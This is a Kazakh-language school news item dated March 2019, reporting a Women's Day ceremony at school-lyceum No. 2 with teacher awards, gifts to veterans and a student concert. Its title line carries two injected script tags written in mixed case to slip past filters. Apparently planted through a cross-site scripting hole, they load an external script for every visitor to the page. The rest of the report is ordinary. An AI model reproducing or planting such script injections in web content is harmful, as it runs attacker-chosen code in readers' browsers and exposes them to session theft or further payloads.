№2 ОМЛ-де Халықаралық әйелдер күніне арналған іс-шара<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.03.2019

Халықаралық Әйелдер күні қарсаңында №2 орта мектеп -лицейінде  салтантты жиналыс болды. Жиналысқа педагогикалық еңбек ардагерлері, көпбалалы аналар, мүгедек-балалар тәрбелейтіндер шақырылды. Әкімшілік Алғыс хаттарымен белсенді оқушылар, қалалық спортакиадада жүлделі І орынға ие болған баскетбол құрама командасының мүшелерін және де әртүрлі сайыстың жүлдегерлерін атап өтті. «Парасатты педагог» алқасымен қазақ тілі мұғалімі Тасмагамбетова Күлшара Сүлейменовна марапатталды.  Іс-шара барысында кәсіподақ ұйымының грамоталарымен ұстаздар мен мектеп қызметкерлері марапатталып, мерейтой иелеріне құттықтау сөздер жолданды. Педагогикалық еңбек ардагерлері, соның ішінде – Светличная Т.В., Полякова М.С. және т.б. , оқушылар жасаған сыйлықтар мен алғашқы көктем гүлі –қызғалдақ  берілді. Әкелер кеңесі  видеосыйлық  спорттық флешмоб көрсетті. Мерекелік концерт мектеп-лицей оқушылары ұйымдастыруымен өтті. Іс-шараға қатысушылар мұғалімдер мен оқушылар дайындаған шығармашылық көрме жұмыстарымен танысты

Просмотров: 502


Пікір қосу



Деректерді қолтаңбаға қосу